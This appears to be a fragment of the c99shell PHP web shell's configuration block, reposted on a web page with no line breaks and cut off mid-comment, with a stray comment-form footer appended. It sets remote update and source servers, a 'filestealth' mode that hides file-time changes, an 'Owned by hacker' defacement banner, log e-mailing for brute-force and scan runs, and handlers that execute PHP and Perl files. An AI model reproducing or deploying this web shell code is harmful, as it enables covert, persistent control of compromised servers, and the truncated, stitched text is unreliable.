$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server$filestealth = TRUE; //if TRUE, don't change modify- and access-time$donated_html = "<center><b>Owned by hacker</b></center>";/* If you publish free shell and you wishadd link to your site or any other information,put here your html. */$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array,display $donated_html.$curdir = "./"; //start folder//$curdir = getenv("DOCUMENT_ROOT");$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or%WINDIR/temp)$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)$log_email = "user@host.tld"; //Default e-mail for sending logs$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or"d"escending$sort_save = TRUE; //If TRUE then save sorting-position using cookies.// Registered file-types.// array(// "{action1}"=>array("ext1","ext2","ext3",...),// "{action2}"=>array("ext4","ext5","ext6",...),// ...// )$ftypes = array("html"=>array("html","htm","shtml"),"txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),"exe"=>array("sh","install","bat","cmd"),"ini"=>array("ini","inf"),"code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),"img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),"sdb"=>array("sdb"),"phpsess"=>array("sess"),"download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar"));// Registered executable file-types.// array(// string "command{i}"=>array("ext1","ext2","ext3",...),// ...// )// {command}: %f% = filename$exeftypes = array(getenv("PHPRC")." -q %f%" => array("php","php3","php4"),"perl %f%" => array("pl","cgi"));/* Highlighted files.
Leave a Comment
5++++++